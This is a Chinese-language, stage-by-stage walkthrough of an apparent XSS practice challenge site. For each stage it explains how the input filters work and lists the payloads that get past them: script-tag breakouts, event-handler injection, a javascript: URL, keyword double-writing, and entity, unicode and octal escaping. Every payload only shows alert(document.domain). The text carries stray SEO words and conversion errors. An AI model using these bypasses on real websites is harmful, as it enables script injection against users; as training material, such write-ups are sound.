XSS Challenges

Stage #1

無過濾,</b><script>alert(document.domain)</script><b>javascript

Stage #2

注入點在input標籤內,先後閉合標籤中間加script語句java

"><script>alert(document.domain)</script><瀏覽器

Stage #3

傳遞了兩個參數,第一個參數過濾了<>dom

抓包,在第二個參數處閉合標籤插入script語句xss

 

Stage #4

跟第三關差很少,抓包發現有第三個參數編碼

在源代碼中找到hackme的位置url

在第三個參數處構造xsscode

Stage #5

與第二關同樣,可是在前段限制了語句長度,抓包構造xss提交便可blog

Stage #6

與第二關同樣,注入點在value標籤中,可是過濾了<>,沒有過濾",能夠用"閉合,構造事件進行xssseo

" onmouseover=alert(document.domain) name="1

onmouseover是鼠標移到上面就會觸發的事件

" onclick=alert(document.domain) name="1

onclick是鼠標點擊會觸發事件

Stage #7

和第六關差很少,不一樣的是這關不僅把<>過濾了,還把"也過濾了,沒法用"分隔屬性,可是能夠用 (空格)分隔

" onclick=alert(document.domain)  要在空格前面加點東西,不然沒法成功

Stage #8

題目要咱們輸入一條url,而後會把url包含在<a>標籤中,點擊觸發彈窗

在url中運行javascript的方法是以javascript:開頭後跟要執行的語句,所以構造一下語句便可彈窗

javascript:alert(document.domain)

Stage #9

utf-7編碼,用F12修改元素 onclick=alert(document.domain)直接過(每關均可以這樣)

Stage #10

注入點在value裏,可是過濾了domain,可雙寫繞過

"><script>alert(document.dodomainmain)</script><

Stage #11

value注入點,會在咱們構造的語句中的script前面加個x,且on事件所有不能用

構造<a>標籤在超連接中執行js,構造時將script中任意一個字母用Unicode編碼

"><a href="java&#115;cript:alert(document.domain)">1</a>

Stage #12

vlaue注入點,過濾了<、>、"和',將空格與"Unicode編碼沒法成功,由於沒法用Unicode編碼"、'、<、>來閉合標籤或屬性

&#34;&#32;onmouseover=alert(document.domain)&#32;name=&#34;1

利用IE瀏覽器(不是Microsoft Edge)識別特性,IE瀏覽器會把``(鍵盤上方數字鍵1左邊的那個鍵)識別成雙引號

構造``onmouseover=alert(document.domain)成功彈窗

Stage #13

style注入點,轉義了<>和"

查資料獲得要利用IE瀏覽器支持的動態特性,可是IE版本過高,沒法復現

Stage #14

同13關

Stage #15

DOM型XSS,轉義了<>"&\,可是\能夠雙寫繞過,能夠用\\003c和\\003e代替<>

\\u003e\\u003cscript\\u003ealert(document.domain)\\u003c/script\\u003e

Stage #16

跟上題同樣,只是替換了\x,即沒法用十六進制繞過,用上題的代碼直接過

\\u003e\\u003cscript\\u003ealert(document.domain)\\u003c/script\\u003e

用八進制編碼也能夠繞過,即將<>用十六進制編碼後再轉爲八進制,格式是\\7四、\\76

\\74script\\76alert(document.domain)\\74/script\\76

Stage #1七、Stage #18

題目說只能在老版本IE上覆現,可跳過

Stage #19

不會,也沒找到別的大佬的WP

相關文章
相關標籤/搜索